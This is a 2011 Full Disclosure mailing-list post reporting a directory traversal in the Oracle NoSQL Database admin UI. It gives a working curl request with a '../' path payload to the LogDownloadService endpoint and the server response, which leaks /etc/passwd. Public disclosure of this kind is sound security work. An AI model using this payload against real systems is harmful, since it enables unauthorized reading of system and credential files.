Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Oracle NoSQL Directory Traversal
From: Buherátor <buherator () gmail com>
Date: Sat, 5 Nov 2011 18:58:20 +0100

Hi List,

I don't know if this worth anything, because the manual says:

"Oracle NoSQL Database is intended to be installed in a secure
location where physical and network access to the store is restricted
to trusted users. For this reason, at this time Oracle NoSQL
Database's security model is designed to prevent accidental access to
the data. It is not designed to prevent malicious access or
denial-of-service attacks."

Anyway, here is the deal:

+++

$ curl -v http://127.0.0.1:5001/kvadminui/LogDownloadService?log=../../../../../../../../../../../../../../../etc/passwd

* About to connect() to 127.0.0.1 port 5001 (#0)
*   Trying 127.0.0.1... connected
* Connected to 127.0.0.1 (127.0.0.1) port 5001 (#0)
GET /kvadminui/LogDownloadService?log=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
User-Agent: curl/7.21.3 (i686-pc-linux-gnu) libcurl/7.21.3 OpenSSL/0.9.8o zlib/1.2.3.4 libidn/1.18
Host: 127.0.0.1:5001
Accept: */*

< HTTP/1.1 200 OK
< Content-Type: application/octet-stream
< Content-Length: 1668
< Content-Disposition: attachment;
filename="../../../../../../../../../../../../../../../etc/passwd"
< Server: Jetty(7.4.0.v20110414)
<
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
[...]

+++

Software: Oracle NoSQL Database 11gR2.1.1.100

Regards,

Buherator

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]